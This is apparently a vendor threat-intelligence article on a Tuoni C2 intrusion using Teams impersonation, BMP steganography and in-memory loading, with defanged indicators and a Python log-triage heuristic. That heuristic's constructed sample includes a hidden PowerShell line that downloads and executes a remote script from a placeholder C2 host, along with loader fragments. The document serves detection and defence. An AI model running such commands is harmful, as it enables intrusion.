In October 2025, Morphisec’s anti-ransomware prevention platform detected and neutralized a sophisticated cyberattack targeting a major U.S. real estate company.
The campaign showcased the emerging threat posed by the Tuoni C2 framework, a free, modular command-and-control tool designed to deliver stealthy, in-memory payloads while evading traditional security defenses.
What made this attack particularly notable was the integration of AI-assisted code generation into the delivery mechanism, as evidenced by the use of scripted comments and the modular structure of the initial loader.
The incident underscores how threat actors are rapidly adopting advanced frameworks and leveraging artificial intelligence to enhance evasion capabilities, creating a formidable challenge for defenders relying on conventional endpoint protection.
The attack began in mid-October through what appears to be social engineering via Microsoft Teams impersonation.
Attackers posed as trusted vendors or colleagues to manipulate an employee into executing a malicious PowerShell one-liner, establishing the initial foothold.
The attacker’s entry point spawned a hidden PowerShell process that downloaded a secondary script from hxxp://kupaoquan[.]com/files/update-web-kupaoquan.com.ps1.
This stage employed an innovative evasion technique: steganography embedded within a seemingly innocuous BMP image file (bg-engine.bmp).
The downloaded script extracted hidden shellcode from the image’s pixel data using least significant bit (LSB) manipulation techniques.
Rather than using direct API calls that security tools monitor, the malware compiled inline C# and leveraged Marshal.GetDelegateForFunctionPointer to invoke native functions dynamically.
This delegation approach created an additional layer of indirection, allowing the payload to bypass signature-based detection mechanisms that traditional antivirus and endpoint detection and response solutions typically employ.
Once executed, the payload reflectively loads TuoniAgent.dll entirely in memory, a technique that leaves minimal forensic traces on the filesystem.
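The chain described above leaves a distinctive footprint in PowerShell ScriptBlock logging (Event ID 4104): a hidden window plus a remote .ps1 download, BMP pixel reads, inline C# via Add-Type, Marshal.GetDelegateForFunctionPointer and a reflective Assembly.Load. The following triage heuristic is an added example, not Morphisec's code or anything from the incident; the indicator names, weights, threshold and the sample script-block text are all constructed for illustration.

```python
import re

# Indicator name -> (regex over ScriptBlockText, weight). Weights are assumptions.
INDICATORS = {
    "hidden_window":   (r"-w(?:indowstyle)?\s+hidden", 1),
    "remote_ps1":      (r"(?:DownloadString|Invoke-WebRequest|iwr|Net\.WebClient)[^\n]*\.ps1", 2),
    "bitmap_pixels":   (r"System\.Drawing\.Bitmap|\.GetPixel\(|LockBits|\.bmp", 2),
    "lsb_extract":     (r"-band\s+1|-shl\s+|-shr\s+", 1),
    "inline_csharp":   (r"Add-Type\s+-TypeDefinition|CompileAssemblyFromSource", 2),
    "delegate_invoke": (r"GetDelegateForFunctionPointer", 3),
    "exec_memory":     (r"VirtualAlloc|VirtualProtect", 2),
    "reflective_load": (r"\[Reflection\.Assembly\]::Load\(", 2),
}
THRESHOLD = 6  # assumed cut-off for the weighted score


def score_script_block(text):
    """Return the weighted indicator score and the matched indicator names."""
    hits = {name for name, (pat, _) in INDICATORS.items() if re.search(pat, text, re.I)}
    score = sum(INDICATORS[h][1] for h in hits)
    # Image decoding together with delegate-based native calls is the specific
    # pairing this report describes, so flag it regardless of the total score.
    chain = {"bitmap_pixels", "delegate_invoke"} <= hits
    return {"score": score, "hits": sorted(hits), "suspicious": chain or score >= THRESHOLD}


def triage(events):
    """events: iterable of (event_id, script_block_text); returns flagged ids."""
    return [eid for eid, text in events if score_script_block(text)["suspicious"]]


# Constructed sample resembling the reported chain (fragments only, not a loader).
SUSPICIOUS_SAMPLE = r"""
powershell -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://EXAMPLE-C2/files/update.ps1')"
$bmp = New-Object System.Drawing.Bitmap 'bg-engine.bmp'
$bit = $bmp.GetPixel($x, $y).B -band 1
Add-Type -TypeDefinition $src
$fn = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ptr, $type)
[Reflection.Assembly]::Load($bytes)
"""
# Constructed benign admin activity that touches .bmp files and the network.
BENIGN_SAMPLE = r"""
Get-ChildItem C:\Users\me\Pictures -Filter *.bmp | ForEach-Object { $_.Length }
Invoke-WebRequest -Uri https://example.com/report.json -OutFile report.json
"""

if __name__ == "__main__":
    print(triage([("evt-1", SUSPICIOUS_SAMPLE), ("evt-2", BENIGN_SAMPLE)]))
```

Feed it the ScriptBlockText field of 4104 events; a single weak indicator such as a .bmp path on its own stays below the threshold, while the stego-plus-delegate pairing is always flagged.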
Tuoni C2: A Rising Threat
Tuoni is a modular post-exploitation framework supporting HTTP, HTTPS, and SMB communications.
The framework offers extensive native commands for agent management and system manipulation, including automatic privilege escalation to SYSTEM level access.
Its heavy obfuscation, with exports XOR-encoded and decoded only during reflective loading, makes analysis challenging.
The threat actors’ configuration revealed the primary C2 server at 206.81.10[.]0, communicating through hxxp://kupaoquan[.]com. Threat intelligence analysis uncovered a secondary domain: udefined30[.]domainofhonour40.xyz.
The proliferation of Tuoni stems from its accessibility. As a free, well-documented framework with active development, it presents an attractive option for ransomware affiliates and other criminal groups seeking powerful post-exploitation capabilities without the cost of proprietary tools.
Prevention-First Strategy
Morphisec’s Automated Moving Target Defense (AMTD) technology detected and blocked the attack before the C2 listener could execute, preventing data exfiltration, ransomware deployment, and lateral movement.
This incident demonstrates why traditional EDR solutions prove insufficient against in-memory, reflective techniques, an increasingly common tactic in advanced threat campaigns.
This attack reveals three essential lessons: First, Tuoni adoption will accelerate rapidly among threat actors. Second, AI-assisted delivery mechanisms combining steganography with dynamic delegation represent the new norm for sophisticated loaders.
Third, organizations must adopt prevention-first approaches capable of detecting threats before execution, as conventional AV and EDR solutions fail against these advanced evasion techniques.
